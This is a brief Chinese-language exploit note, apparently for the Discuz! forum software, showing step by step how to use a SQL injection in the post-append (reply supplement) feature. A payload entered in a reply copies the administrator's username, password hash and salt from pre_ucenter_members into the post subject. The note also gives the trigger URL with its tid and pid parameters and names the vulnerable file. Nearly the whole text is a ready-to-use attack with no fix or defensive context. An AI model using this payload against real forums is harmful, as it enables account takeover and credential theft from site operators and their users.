在发表回复的地方输入注入语句：
a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where

uid=1 limit 0,1),comment='
然后到回复补充那里随便补充一下，注入语句就被执行。
补充的地址：
forum.php?mod=misc&tid=3&action=postappend&pid=7

把里面的tid换成贴子的ID，pid换成回复贴子的ID

上面的语句就会把取得的内容写进回复主题返回。
漏洞文件：
source\module\forum\forum_misc.php